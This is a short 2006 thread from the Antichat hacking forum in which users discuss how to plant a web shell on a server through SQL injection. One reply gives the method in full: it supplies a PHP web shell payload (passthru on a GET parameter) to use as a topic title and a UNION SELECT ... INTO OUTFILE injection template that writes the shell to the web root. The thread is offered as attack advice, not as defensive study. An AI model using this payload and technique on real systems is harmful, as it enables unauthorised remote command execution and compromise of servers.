Форум АНТИЧАТ - Помогите имея скул иньекцию залить на сервер шел

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Помогите имея скул иньекцию залить на сервер шел (https://forum.antichat.xyz/showthread.php?t=21334)

arts	04.07.2006 17:57

Помогите имея скул иньекцию залить на сервер шел

Как имея скул иньекцию залить на сервер шел?
возможно ли такое??

Romaxa55

04.07.2006 18:11

да возможно, используя запросы wget

SMiX	04.07.2006 19:26

Запросы wget здесь нипричем =)

действия примерно такие(на примере форума):
создаешь топик с именем <?php passthru($_GET[cmd]) ?> и
потом через sql-иньекцию выполняешь запрос опять же что-то типа -1 UNION SELECT topic_name, null, null FROM bb_topics INTO OUTFILE абсолютный_путь_к_шеллу WHERE topic_id = номер_топика

*Van*

04.07.2006 19:38

http://forum.antichat.ru/thread19605.html

Тут написано, как получить шелл с помощью SQL-inj

Romaxa55

04.07.2006 19:51

Верно, спасибо за расширеный ответ.

qBiN	04.07.2006 20:34

Пользуемся поиском.
Тема закрыта.

Время: 02:28